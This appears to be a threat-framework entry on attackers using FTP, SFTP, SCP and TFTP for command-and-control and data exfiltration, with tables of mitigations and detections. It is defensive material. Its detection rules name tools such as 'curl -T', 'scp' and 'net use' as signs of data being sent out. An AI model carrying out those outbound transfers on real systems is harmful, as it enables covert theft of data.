File Transfer Protocols
In the Deepening Control phase, attackers leverage File Transfer Protocols as a C2 channel to establish persistent communication with compromised systems while evading detection. This sub-technique utilizes standard protocols like FTP, SFTP, FTPS, SCP, and TFTP for command transmission and exfiltration, exploiting their legitimate presence in corporate environments. Adversaries encode commands within file transfers or utilize these protocols' control channels for direct command execution, benefiting from the protocols' encryption capabilities (particularly in SFTP and FTPS) to obscure malicious traffic. Unlike web protocols that might face strict proxy inspection, file transfer protocols often receive less scrutiny in network monitoring systems, creating security blind spots. Detection requires analyzing anomalous connection patterns, unusual file transfers, unexpected protocol usage, and monitoring for unauthorized encrypted sessions established through these standard network services.
Mitigations
| ID |
Mitigation |
Description |
| M1031 |
Network Intrusion Prevention |
Deploy IDS/IPS signatures that flag anomalous SMB/FTP/TFTP/SCP command sequences, unexpected PUT/STOR operations, or encrypted FTPS sessions to untrusted external hosts, and automatically block or isolate offending traffic. |
| M1037 |
Filter Network Traffic |
Restrict outbound file-transfer protocols to approved servers via explicit allow-lists; force traffic through authenticated gateways that inspect content and enforce size, type, and destination policies. |
| M1030 |
Network Segmentation |
Place services that legitimately require FTP/SFTP/SMB in isolated DMZ or dedicated VLANs, disallowing peer-to-peer file sharing across trust zones and minimising an attacker’s ability to pivot or exfiltrate data. |
Detection
| ID |
Data Source |
Detection |
| DS0029 |
Network Traffic Content |
Inspect control and data channels for embedded commands, abnormal banners, or high-entropy payloads; alert when binaries or archives are transferred via FTP/SFTP/TFTP outside scheduled maintenance windows. |
| DS0029 |
Network Traffic Flow |
Baseline normal file-transfer volumes; flag large outbound transfers over ports 20/21/22/69/445 or sudden SMB sessions between hosts that do not typically share files. |
| DS0017 |
Command Execution |
Detect unexpected invocation of built-in utilities (ftp.exe, curl -T, scp, net use) by non-administrative processes or scripts, and correlate with subsequent network activity. |